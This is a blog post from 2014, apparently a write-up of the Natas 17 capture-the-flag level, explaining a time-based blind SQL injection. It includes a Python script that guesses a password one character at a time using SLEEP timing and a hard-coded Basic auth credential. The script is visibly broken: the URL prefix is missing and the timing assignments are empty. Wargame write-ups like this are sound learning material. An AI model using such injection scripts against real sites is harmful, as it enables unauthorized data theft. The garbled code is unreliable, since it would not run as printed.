Monday, November 10, 2014

Natas 17

From the welcoming page, it looks like Natas 17 will be some kind of SQL injection again.

Looking through the code, it looks like the request parameters are being directly passed into the SQL query again, but this time the output that's displayed back to us is commented out.

 This causes a problem because it no longer matters what the query returns -- in all cases, there is no response.

We can, however, use a side-channel like the time it takes for the SQL query to execute. This is the first example of a "blind" SQL injection so far.

I wrote a quick python script that automates a process of constructing the query so that if a guess of a substring of the password is correct, the query will sleep for 2 seconds. The script then tracks how long each web request takes to return and uses the timing information to decide whether the guessed password substring was correct.

Here's the code:

import urllib2
from datetime import datetime

auth_head = 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=='
alphanumerics = map(chr, range(65, 91) + range(97,123) + range(48, 58))

def make_url(char, start):
    return ","+str(start)+",1))=ASCII(%22"+str(char)+"%22)%20AND%20SLEEP(2)%20AND%20%22a%22=%22a&debug=true"

def is_correct(char, start):
    #print make_url(char, start), "-->",
    req = urllib2.Request(make_url(char, start))
    req.add_header("Authorization", auth_head)
    t1 =
    response = urllib2.urlopen(req).read()
    t2 =   
    #print (t2 - t1).seconds
    return (t2 - t1).seconds > 1
password = ""

while len(password) < 32:
    print "Password =", password
    for char in alphanumerics:
        if is_correct(char, len(password)+1):
            #print "correct! -->", char
            password = password + char

print password
print "Woohoo!"

The output takes a few minutes to process, but the result is the password for natas18!

No comments:

Post a Comment